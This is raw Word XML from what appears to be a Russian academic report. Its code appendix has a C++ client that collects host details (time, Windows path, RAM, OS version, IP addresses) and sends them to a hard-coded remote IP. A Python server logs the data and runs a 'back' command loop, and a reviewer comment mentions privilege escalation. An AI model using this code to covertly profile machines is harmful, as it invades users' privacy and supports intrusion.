      <w:proofErr w:type="spellEnd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]:"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(s4)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"\n[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ProcRevis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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]:"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(s5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1E332ED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R_I_S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gramStart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4258DA2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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SYSTEMTIME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FB74A07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GetSystemTime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59FE800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GetLocalTime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lt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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29432C6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R_I_S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"[SYS_TIME]:"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st.wHour</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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st.wMinute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6CA98D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R_I_S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"\n[LOC_TIME]:"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lt.wHour</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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lt.wMinute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B154F9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bufferer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256] = </w:t>
      </w:r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15AAA0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dwSizee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countof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bufferer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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D3F919E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GetSystemWindowsDirectoryW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bufferer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dwSizee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C23DE7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3039A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test3(&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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bufferer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14:paraId="18CDA927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test4(test3.begin(), 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test3.end(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4DEF5AA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R_I_S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"[PATH]:"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test4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gramStart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88352F3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physicalMemory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112061A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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ULONGLONG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ram;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2B80D469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GetPhysicallyInstalledSystemMemory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(&amp;ram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8618622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rams = ram / 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1024;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="206377FE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R_I_S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"[RAM]:"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(rams)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gramStart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2FF1EDC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osVersionName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GetOsVersionName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4F9602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R_I_S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"[WIN_VER]:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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83A8FC5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R_I_S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osVersionName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AA743B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proofErr w:type="spellStart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ListIpAddresses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3A072D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R_I_S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str;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1C321A0C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ASCIIToOctal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(R_I_S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),itogi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_2=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1E09E3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R_I_S.c_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6E26E7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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WSADATA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wsData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CD732CD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erStat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WSAStartup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MAKEWORD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(2, 2), &amp;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wsData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C4B5DF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erStat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14:paraId="6381E5DB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95BE518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57077BA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6ADE246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7CE911D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socket(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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AF_INET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SOCK_STREAM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0AA1DEC7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EC3894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INVALID_SOCKET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438020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closesocket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9716EF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WSACleanup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5770FE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3969384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2A62796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B49906A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361425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3039A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in_addr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ip_to_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5AF76A1" w14:textId="01312B8A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erStat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inet_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pton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AF_INET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039A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"230.234.2.59"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ip_to_num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66D841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erStat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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F830EB4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1D7E81B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F0300B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3039A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sockaddr_in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servInfo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37006D7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servInfo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servInfo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BC32EB5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servInfo.sin_family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AF_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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INET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9E3D655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servInfo.sin_addr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39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ip_to_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4A24907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servInfo.sin_port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htons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1200);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D87CB2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erStat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connect(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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23039A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sockaddr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servInfo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servInfo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C34628C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erStat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14:paraId="60B5834D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closesocket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7B1723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WSACleanup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335E59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4B764DC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AA50E4F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922C3FE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C5B233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C5240F1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packet_size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A924567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packet_size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spellStart"/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), 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487D50F7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packet_size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error!=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1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A97F7B0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05DA42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closesocket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92B5C0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error = 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21533AD4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WSACleanup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04AAB7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B15DDD5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EC2CCB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packet_size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M,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servBuff.size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(), 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7F1753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03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packet_size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3039A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOCKET_ERROR</w:t>
      </w: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AEB21A" w14:textId="77777777" w:rsid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closesocket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ClientSock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F37F51" w14:textId="77777777" w:rsid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WSACleanup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68012C" w14:textId="77777777" w:rsid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01B80C" w14:textId="77777777" w:rsid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2FE6DA4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sc_</w:t>
      </w:r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work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C0F8C8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714E015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closesocket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ClientSock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E54DCA" w14:textId="77777777" w:rsidR="0023039A" w:rsidRP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WSACleanup</w:t>
      </w:r>
      <w:proofErr w:type="spell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3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E5EEC9" w14:textId="77777777" w:rsidR="0023039A" w:rsidRDefault="0023039A" w:rsidP="0023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772238" w14:textId="30CEAD79" w:rsidR="00375B3D" w:rsidRDefault="00375B3D" w:rsidP="00375B3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3E1C9DC" w14:textId="77777777" w:rsidR="00375B3D" w:rsidRDefault="00375B3D" w:rsidP="00375B3D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B0B8CE" w14:textId="4E7AD68E" w:rsidR="002A3235" w:rsidRPr="00095A49" w:rsidRDefault="00EE779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</w:t>
      </w:r>
      <w:r w:rsidRPr="00095A4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375B3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Б</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AEF17F" w14:textId="77777777" w:rsidR="002A3235" w:rsidRPr="00095A49" w:rsidRDefault="002A32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F8F39A" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00095A49" w:rsidRDefault="00872B4F" w:rsidP="0087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5A4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09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5A49">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A63A7B" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00095A49" w:rsidRDefault="00872B4F" w:rsidP="0087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95A49">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>serv_sock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0009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5A49">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00095A4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95A49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proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00095A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95A49">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00095A49">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.AF_INET</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0009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95A49">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00095A49">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.SOCK_STREAM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00095A49">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, proto=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221E4ADD" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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serv_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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sock.bind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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B41F73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'230.234.2.59'</w:t>
      </w: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, 1200))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2AD361" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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serv_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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sock.listen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FC1AF0" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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A235D6" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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F73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work(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B41F7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6BF84BF9" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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B41F7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878B9D" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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1F73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open(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B41F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41F73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Journal.txt"</w:t>
      </w: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41F73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"a</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B41F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,encoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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B41F73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"utf-8"</w:t>
      </w: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41F7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Jour:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E03DF1F" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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Jour.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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1F7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93A756" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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1F7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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B41F7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.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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1F7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8790D8" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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win_ver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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B41F73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[17</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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].split</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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1F73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CC7906" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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1F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win_ver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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0]=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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B41F73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"[WIN_VER]"</w:t>
      </w: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F73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win_ver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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[1]==</w:t>
      </w:r>
      <w:r w:rsidRPr="00B41F73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Windows8OrGreater"</w:t>
      </w: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A4BAAC1" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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1F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F73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"back"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E28436" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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6B3C8" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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flag=</w:t>
      </w:r>
      <w:r w:rsidRPr="00B41F7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14:paraId="4A5BC0EB" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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F7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flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D04D93A" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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choose=</w:t>
      </w:r>
      <w:r w:rsidRPr="00B41F7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14:paraId="7E0E6873" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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1F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choose==</w:t>
      </w:r>
      <w:r w:rsidRPr="00B41F73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"back"</w:t>
      </w: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9C9F094" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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b=private(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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).encode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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1F73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'utf-8'</w:t>
      </w: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1F075A" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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client_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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sock.sendall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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(b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7869DA43" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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client_sock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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client_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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serv_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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sock.accept</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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FE742FD" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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41F73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'Connected by'</w:t>
      </w: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client_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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01A71F" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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client_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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client_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7875277A" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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client_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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client_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41785DA5" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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1F7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F7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1AD5331" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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1F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choose==</w:t>
      </w:r>
      <w:r w:rsidRPr="00B41F73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"back"</w:t>
      </w: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15D46E2" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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B41F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</w:p>
    <w:p w14:paraId="62751BE6" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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client_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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sock.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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(2048)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BC318D" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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1F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1F73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not</w:t>
      </w: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data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC5D6BF" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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1F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</w:p>
    <w:p w14:paraId="1FCC4624" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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1F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data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAB8427" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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choose=work(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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data.decode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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1F73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'utf-8'</w:t>
      </w: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0F9CB66" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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41F73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data==</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B41F73">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b'Closed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B41F7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9FCCC04" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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flag=</w:t>
      </w:r>
      <w:r w:rsidRPr="00B41F7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14:paraId="622B85A0" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="0087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1F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</w:p>
    <w:p w14:paraId="3AB2329A" w14:textId="77777777" w:rsidR="00872B4F" w:rsidRPr="00B41F73" w:rsidRDefault="00872B4F" w:rsidP="00872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735A39" w14:textId="614C11DD" w:rsidR="002A3235" w:rsidRDefault="00872B4F" w:rsidP="00872B4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1F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sock.close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B590251" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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BAAD73" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A323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A3235">
      <w:footerReference w:type="default" r:id="rId38"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1135" w:right="707" w:bottom="142" w:left="1560" w:header="708" w:footer="708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Сергей Зотов" w:date="2022-07-02T01:23:00Z" w:initials="">
    <w:p w14:paraId="25FEE585" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE77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Про привелегии я бы стрелочку повернул и убрал их, хватит первых двух, а повышение вариант для дальнейшей работы</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="2" w:author="Сергей Зотов" w:date="2022-07-02T01:29:00Z" w:initials="">
    <w:p w14:paraId="2D3E25FF" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE77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Прим.: и дальше пример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FEE585" w15:done="1"/>
  <w15:commentEx w15:paraId="2D3E25FF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FEE585" w16cid:durableId="266CD7A4"/>
  <w16cid:commentId w16cid:paraId="2D3E25FF" w16cid:durableId="266CD7A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25EA4" w14:textId="77777777" w:rsidR="00EE7791" w:rsidRDefault="00EE7791">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="646198AD" w14:textId="77777777" w:rsidR="00EE7791" w:rsidRDefault="00EE7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FEA2F" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE77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F5C28">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="5137C844" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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D0D13" w14:textId="77777777" w:rsidR="00EE7791" w:rsidRDefault="00EE7791">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4ECA1A2D" w14:textId="77777777" w:rsidR="00EE7791" w:rsidRDefault="00EE7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43AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="69E4BC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B3423A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB32C9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C461340"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="68D2CB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7D61ADB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA58E400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EB5F67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="96E448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CD310D6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="307463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00C1BC0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A124489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624" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1128" w:hanging="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1692" w:hanging="1080"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1896" w:hanging="1080"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2460" w:hanging="1440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2664" w:hanging="1440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3228" w:hanging="1800"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3792" w:hanging="2160"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="202731E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF9E8C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2E2312"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="221AB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38555A2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F6CEE6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3DD113A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="35BCED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485632"/>
    <w:multiLevelType w:val="multilevel"/>
